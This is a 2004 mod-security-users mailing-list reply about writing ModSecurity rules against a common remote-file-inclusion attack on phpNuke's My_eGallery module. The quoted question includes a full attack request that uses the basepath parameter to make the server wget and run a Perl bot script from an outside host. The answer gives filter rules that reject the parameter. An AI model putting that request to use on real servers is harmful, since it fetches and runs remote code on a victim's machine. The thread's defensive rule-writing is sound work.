Re: [mod-security-users] rule for common My_eGallery exploit
Brought to you by:
victorhora,
zimmerletw
Menu
▾
▴
Re: [mod-security-users] rule for common My_eGallery exploit
|
From: Ivan R. <iv...@we...> - 2004-08-23 12:30:02
|
Hugh Beaumont wrote: > Hi, > > Does anyone have a good rule to catch the following types of requests: > > GET > /modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt > > This is a very common exploit against phpnuke's eGallery module. > > I am new to mod_security and am not sure what the best rule would be to block these requests > without also blocking other requests with the work basepath in it. > > I think the key part would be something like: > > block everything with the string: > > ?basepath > > or > > ?basepath=http > > Any ideas? Assuming the basepath parameter is not supposed to be used from the outside at all, the correct approach is to reject all requests that contain this parameter: SecFilterSelective ARG_basepath "!^$" If there are valid cases where this parameter is used then you'll need to give us some examples of valid uses. We could then create a rule that accepts only valid (safe) requests and rejects attack. If the only way to exploit the application is by fetching and executing a remote page then a simple: SecFilterSelective ARG_basepath "!http:" will probably do. But I suspect users can also use the basepath parameter to read arbitrary files from the server, which is probably something you don't want either. -- ModSecurity (http://www.modsecurity.org) [ Open source IDS for Web applications ] |
